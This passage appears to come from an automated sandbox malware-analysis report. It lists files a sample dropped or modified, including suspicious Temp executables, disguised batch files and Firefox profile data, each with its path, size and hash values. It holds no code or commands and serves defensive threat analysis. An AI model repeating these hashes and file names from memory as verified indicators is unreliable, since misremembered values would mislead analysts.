                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          420B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          410af9f9883c6c7fa57d5de1d71b4d54

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          028ad738ff369741fa2f0074e49a0d8704521531

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          067b25c7c2e27041dc47a0a4564b56a6bbfdc41e5dd630dbf070fdada4dbff71

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          d25e8a6ec39c67f85835969285a8da4a950444ae75e207a7168ca524a55a8fd7779555e4623723321644571e3ac40df5a8098e6317d8ba60b686cf309b8d3bda

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10427960101\20273858a2.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          1.8MB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          fdec7bb84898ed268b714fa36d24e456

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          204308638a388cbaabc35e89014a611a2a7eafeb

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          fe66c41ede5ab2060e341e7a29b0bc1d14528038f1737ad86e86b19edb2de354

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          57252b6047306265b49732f106f942b98bfae111c0b87e89aa632ca0950462960ea0ee92a26aff40d57d8b35d5957244b691fb52a8c192723f774f5584548285

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10427970101\PQPYAYJJ.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          4f8afc2689243991dcede77ebc8b25c8

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          4504bfb7458298826d7a09dca4edd4e8c520497d

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          8609fbf6d25103698c09480062dd212a9f8e8acbc3d320f599bd871cef1a7048

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          4e2cdec8a27a6bec4704c8351fd1e8b05bdab66798b67590d271ca48a0a8f36b394ac744e08e2e4b36f11bda171f00b0addf71188e601aad312cfec8bfed5ec3

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10427980101\Rm3cVPI.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          354KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          27f0df9e1937b002dbd367826c7cfeaf

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          7d66f804665b531746d1a94314b8f78343e3eb4f

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          aff35e23562fc36f4b8f6b5bf95eb5dbf11e8af6674e3212aa0c4077ddfe8209

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          ee4e7e5a8ffe193a8487dd4e9bfb13affa74cacdf250a4e22ed0fc653bbfb615855771dd41d295be905bed311c1690874ce61a5a9d9a5745b4bc550715c7de17

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10428010101\e5c64e905f.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          1.8MB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          4dece9dcf2088ff186c4daa7090c9f76

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          7ac603d6d2b745de01d6e3421b95ef84e7d6e449

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          c14af7d2ec582bc42e00996d6646c59af2d507ff3c0dad1c04c266490f12805d

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          1d96c25b3a09b8b94898cc9c48f865a4213ad12993867912766d49b94502cc66cf38b6156e99e772e6e7d3f9eef51d3bb45a1de8d3e191cdbf3c1820dc48afad

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\261.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          88KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          89ccc29850f1881f860e9fd846865cad

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          d781641be093f1ea8e3a44de0e8bcc60f3da27d0

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          4d33206682d7ffc895ccf0688bd5c914e6b914ea19282d14844505057f6ed3e3

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          0ed81210dc9870b2255d07ba50066376bcc08db95b095c5413ec86dd70a76034f973b3f396cafcfaf7db8b916ac6d1cbca219900bb9722cb5d5b7ea3c770a502

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\44380d9e-dcc8-4d54-b6ba-e3295efd3de6.zip

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          3.7MB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          c4680b37814f7aabd08f6ab32e20dc3e

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          79c9a9397a0be98c7bdaae45e5977fefb91c9e72

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          535247caf4912ac6ca4faf09005a97c7587116a4b1bdbe7e762af34a8d1d71e9

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          bdbdc2c4ed14778cc1efdd5f4728c29642d159edf3351f800a9a5f224142d82176dd9becfccd93b275b6ee8f517395a993bc61fedae0db2724d784a263346175

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Bc.wbk.bat

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          24KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          aee7816472439f47b4aa818ff773dc5c

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          a87fbe8ffd5323e789712d19318d2d0e72554a0e

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          1ac3ccd1e88fb7649020227e8ec53d33f8f70f5a1a987f003c4c8846f14e9e9a

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          730f55d5d06acdbc271706aed70e233ae53cd6a4db3c7e186caf02df0c2a385ac605199f78b9c46c5bd1cdaf52cb9efdd8b8c71f5673e791d696ae7a17beb433

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\C90D.tmp\C90E.tmp\C91E.bat

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          e5ddb7a24424818e3b38821cc50ee6fd

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          97931d19f71b62b3c8a2b104886a9f1437e84c48

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          4734305286027757086ef56b9033319ec92c3756e3ca41d7bf22c631d392e1ea

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          450101acf9a4a39990d0cb0863794c0852fdf14f37a577af520fe7793b4ed70b5dd07a74f9fec42d9f762b4f45140eca75442b0ce76585a2c2646af64ffc4d21

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Expectations.cab.bat

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          25KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          ccc575a89c40d35363d3fde0dc6d2a70

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          7c068da9c9bb8c33b36aed898fbd39aa061c4ba4

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          c3869bea8544908e2b56171d8cad584bd70d6a81651ca5c7338bb9f67249500e

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          466d3399155a36f2ebc8908dba2838736a2effe4a337a3c49ff57afc59e3394f71c494daa70b02cb13461c3e89c6ad3889e6067a8938d29f832810d41f7d5826

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yeraph1v.hwl.ps1

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          60B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          1.8MB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          c19e763bd975bce9126d430b791daafb

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          da1675700c0f3c5e58f7ba0377a505634730e653

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          679cd77725c32a0d630aa1599d683720d738c24148ebfb04b9509f561862906e

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          662822b1472e814849cff1da77ba27d7f78d2ec0615a12ba04140238bbee00ba7c2b54aa502c345e17630cf8de1d2f1fdb48316f65bfd7a3a83ce1904f91ad5c

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\scoped_dir1176_170579822\fc1e9240-2fc4-47ff-9ef0-2a734b9ba341.tmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          152KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          dd9bf8448d3ddcfd067967f01e8bf6d7

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          d7829475b2bd6a3baa8fabfaf39af57c6439b35e

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          fa2232917a5656ea4f811936561ea6b7c92b3c0004c5e08ecb97636d3afc6f72

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          65347df34378c2bbb34417e2cccfb3251a0b2412422cc190eed9df525b6e0a9948e0295ea3c33b3ad873ce81e369e89a138ac41d6eb7229546c3269107e661de

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\svchost015.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2.9MB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          b826dd92d78ea2526e465a34324ebeea

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          bf8a0093acfd2eb93c102e1a5745fb080575372e

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          7824b50acdd144764dac7445a4067b35cf0fef619e451045ab6c1f54f5653a5b

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          1ac4b731b9b31cabf3b1c43aee37206aee5326c8e786abe2ab38e031633b778f97f2d6545cf745c3066f3bd47b7aaf2ded2f9955475428100eaf271dd9aeef17

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          11KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          25e8156b7f7ca8dad999ee2b93a32b71

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          db587e9e9559b433cee57435cb97a83963659430

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          ddf3ba4e25a622276755133e0cce5605b83719c7cab3546e09acbfed00d6a986

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          1211b2fa997ba13ff926aec58b6b35a81d7fe108b0caa8f4d6369d0a37f8481373b78a4b201651243adde9e2b2699ce929482a46226ff6299b0a0e40fe2ddc56

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          14.0MB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          bcceccab13375513a6e8ab48e7b63496

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          63d8a68cf562424d3fc3be1297d83f8247e24142

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          a6af95a209b2e652ed6766804b9b8ad6b6a68f2c610b8f14713cd40df0d62bf9

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          d94483deaae98bf9212699f1ab0bd913f6151a63e65ebc1ea644ab98d5e3ebd74ecaa08f70aca31e11a5d2c64d1504b723817af35bbe9d7b05c758dd6945d484

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          502KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          e690f995973164fe425f76589b1be2d9

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          e947c4dad203aab37a003194dddc7980c74fa712

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          87862f4bc8559fbe578389a9501dc01c4c585edb4bb03b238493327296d60171

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          77991110c1d195616e936d27151d02e4d957be6c20a4f3b3511567868b5ddffc6abbfdc668d17672f5d681f12b20237c7905f9b0daaa6d71dcdac4b38f2448b2

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\3LgWs99XJN.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          18KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          2c8fe78d53c8ca27523a71dfd2938241

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          0111959e0f521d0c01d258abbb42bba9c23e407d

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          eb63fd45ed7ec773eccaf0f20d44bc9b4ed0a3e01779d62321b1da954a0f6eb8

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          4fba46ecc4f12bae5f4c46d4d6136bb0babf1abf7327e5210d1291d786ce2262473212a64da35114776b1ce26ead734a9fd3972ffa0f294d97ab6907953fd137

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\AlternateServices.bin

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          dfafba37c889d27d204a4dea521347e6

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          dcab218a4caa415feb15387eef0b5de95d8bcf75

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          6bfe4f878c3df206144ec76538d3438e86714bcb9782c65ed68e5a0b77c5024b

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          2330e6196e69cf643a7b946e64cc9eecea04f49b6a5433b6053b974767865e63036889171d262e5f6615ae82cf29a92a72cdf5c160e5497989c72720697e0c12

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\AlternateServices.bin

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          17KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          699e6abe3b60863f0089fb666cac514e

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          1d6b3cdb7d00348608afb4c74be2066e423f4b61

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          59c872297e5c15cf6ea56f80e7207ac5dd5eaf3f5a2201d2035638c464061c78

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          2a1ce0bbfd1c08f5d034086cfb8b11c2adc63e358171fa819c301e115364021919c3ddbfbb368d27eb6a1ead2602f797b8de9fde3c2b30316b22aa75a4639846

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          55KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          1f93fb3d558dec516d374f16f02c3704

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          008df8f08a024f465e0d21e11e80c43e7e746073

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          7b7032e5a287e433f2a6beccf9394eb04ec840b4f304a29f1a5ed3390d87b0ec

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          744b3a713578de0a60f503578e2f08e9fd2fe552e3315e55e643d4c9b017e5903bfb5e7949ef72107ee3b5833038677997f858d4dcbc6c3c569524f9f81d8dd9

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          55KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          e08102ff67030c270efebd5b10154995

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          70381e00c273a85786122e71ab8aaa9fd924db7a

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          bc17ee565f0420052548fc2fc3ca39946bd4584dbefc719ebb74252255236eb8

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          3820c3e2a96e491052e7cb7d3b9339be20587f85c22952e5743b4a4751bd88f0c00b78b8fcdb524c5654145ea0a9744ea89636a26b749b1940fd88375289166f

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          55KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          f07f5226ed6776c45eaddf5367653009

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          fb2e6d17fd5dcea90134185e78da40c1786cb791

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          33605c28b1d201f410e7ad5bc300793df311b4c8db4b5fdba3d93e774059695f

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          8ece2c769ad840b46f7497bf0d0e899a7bac74979cabded9871c28bd28222e2dff1326239f564c6f010764003aba389a01b09300afc10ec0edc32dda20752ceb

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          6KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          4ab5aaad1b0443a9f130f4d316280fb5

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          337f87a5da1a67a85d4f309d071ef49a23ddc384

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          5b103e069ea5b6b14b56b7ee73c1f8c37ec6f3c7a59a18cb17dc0260fcfdf996

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          ac50b9fd1fc02be4e9172559d1b5629c899617aab18aa781db2f3f6171445ee551265031a26da3a23d46eece0033c854c26cb854f4f2eaba7f89076557e0d42e

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          6KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          5bf57518c779b02977ba023f6dfd8139

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          977381ddd2fc11e1fd9e3d5ea1e95d5ce2d03e18

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          61cb7fb0966d321c1109ac77d83c593ba99bb3bb03b19cc9d115c36f951d7f56

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          8ba3a933cf574ebd82dd059fdf3c01e896f8f6299f13c11bc0483bb98385873f2893c811f5f768ec11af26a2bcbdf24219bd5f5f0e14446cde1da487714209cc

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\datareporting\glean\events\events

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          fed92275e23f300625742a03990c25c1

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          40f3a2d58eb60f3290ee28d820d59f5c6d5d445c

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          b462dc5c6c3f4f14a0e9b02126773d7a5f1743b022043a7bd2a27029e4fd460b

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          ce248e909b2b4e84c0c736d9706c331ffd97be7644e53782e642e2d90a73b56dc4215d9eac46350f8a775f57d6aff57a6978483a8154a13a7d1e44613ce9e433

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\datareporting\glean\events\events

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          5KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          8013085d8d72229d60feeca9c5a7b3da

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          6e8d55da2764fb169aa588741f0affa1f6a4b479

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          009b42be793eb7c7ceef53508c4f18b67825138725e2f2d8fe9e42d13d4fe786

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          3e1dd253d1be5eb7f22ab9de880275a7f42951839eabef2ea9fcc06b7dc74aaef008138fce8c2702c5acdaa762a3d350772923753b2784342c9f49cba172904d

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\datareporting\glean\pending_pings\05f5dc80-3829-4716-8a4e-893d0c71e0b9

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          886B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          44085d88528e956234aa310539d809e5

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          daf207b63c32a082db44088862e6ca341ad86faa

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          d113223313280f41a64105ea79649fb7a9ec065be0405a5fe68f2301d0af9db6

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          547fa16d4ac1dc3a4c6f79dc46255bc1e4019744b8ae9a739e268a9c093dd459c50af17da858dc745357aa791e22e6d0fd43a6c2f9437d3327fe90848b7309c1

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\datareporting\glean\pending_pings\24b3409e-392e-413d-8af3-2fabd2b4aa2c

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          883B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          3bbdbbeaa3129fe06d810a16fcd9a70e

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          eee1e5b58eb652eb534ad0429cbe1c53f8a1ed74

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          84ac078683fcff7a31f5063c7456f43f149d4ae6cee9eae6c0a9566c694f6f34

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          ee7a2c14dfaf24f640dae1ab0be3d540cb3eb2b854f279771d8b62eb12cd7974da8da301b9ddc7885bb22e4946cdeea73b21598b7b31630289f06d837ed38790

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\datareporting\glean\pending_pings\59ec97f8-a84d-416f-a9e3-89a6917ad5f1

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          9fdcd20c3f0eb8a591601fe51034018e

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          67eb811fda88f009b2bd81f1d01cbd273ab063ab

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          35cb3a795eec8803576d8375720cddfc70437b0821bad2691cef5a2d951e23b4

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          87c2b053a53d280526e2936059981c8b43bd560289a5c501212f283750fd9f2d7b0f1f441ba6fcca0b6e431e483dfb95fcd1bafb44a9cea66b89d6ebca21ada4

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\datareporting\glean\pending_pings\66286589-e488-4eaf-b957-0b75efd43d02

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          235B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          6a2b33bab26cd38eaafc5693899dd584

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          cd238ed69a38a66669f65976127a059bb31fc3dc

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          2ebd4cb647966d1f66ed9bc2a7262214ca703df12ccb03cf869e92a48167ec76

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          c238d773b5d7cf55f8a2eeb8c45a957749587a3f8c52e5fa8c58968276ba8c6d942a59ff28ba760872fd213fdcd2b2dff3e4238089f593ba2e2b0c094151314d

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\datareporting\glean\pending_pings\7ed5765e-8a29-4ab2-adc8-1c691f8dd0d8

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          16KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          0f73a62d8a31595670d0b289912e4c40

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          319ecb8db208233c1cc48b45ad640cff171d2e6e

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          ede36f8870404e50e98d0e8aae1670139f4619a274f7e5426c98b208ec1653e3

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          cdb577cb62655b874fcd770ff3a43475407faaf4462909958d436c9fa074e4d1112c5124001aef72fd752fab7c9a8238cf9f42cde5f314f6e133aa7bfbca6bf2

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\datareporting\glean\pending_pings\eeb3faec-98d9-4f48-8ace-e4d7c9360d19

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          235B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          bebebc4979e307a88e53144b0a5d0215

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          668011d5bcdf7732690840884bba1bc4018c31b5

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          c1e7ac9b830fd0cb7a0a2413a0597328a90afd7e7edd092db23985f9c5f0f505

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          c40782eefbcbda3c2b518eb523d24870e61451e5a93bb73e393620195fb0271ca5fb329898da9c2acd66ef486656a60032f97d15f3986cc1ad14166d89edc695

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\extensions.json

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          16KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          8d98273d987a6e04e9ad1bffc4862088

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          7cff2fc123d7b1776b664e7251b315a7167e5b98

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          787e75be2cbac9e064030eb479c57878f6839a9ba69e9bf0fab4743f90d4c345

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          783abf2be205fcce417209d76dd16f4c635b62810e66f658fd47c4153f5eb99eb0b248def28f1d890eeafb2817fd7d1462bef590f3a9b8dadffa7e8ed0c3cec9

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.dll

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          1.1MB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          626073e8dcf656ac4130e3283c51cbba

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          7e3197e5792e34a67bfef9727ce1dd7dc151284c

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          37c005a7789747b412d6c0a6a4c30d15732da3d857b4f94b744be1a67231b651

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          eebdeef5e47aeadfeebdbab8625f4ec91e15c4c4e4db4be91ea41be4a3da1e1afeed305f6470e5d6b2a31c41cbfb5548b35a15fccd7896d3fde7cdf402d7a339

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.info

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          116B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          ae29912407dfadf0d683982d4fb57293

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          0542053f5a6ce07dc206f69230109be4a5e25775

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          fe7686a6281f0ab519c32c788ce0da0d01640425018dcffcfcb81105757f6fe6

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          6f9083152c02f93a900cb69b1ce879e0c0d69453f1046280ca549a0301ae7925facdda6329f7ccb61726addee78ba2fffc5ba3491a185f139f3155716caf0a8d

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\gmp-widevinecdm\4.10.2891.0\LICENSE.tmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          473B

                                                                                                                                                                                                                          MD5

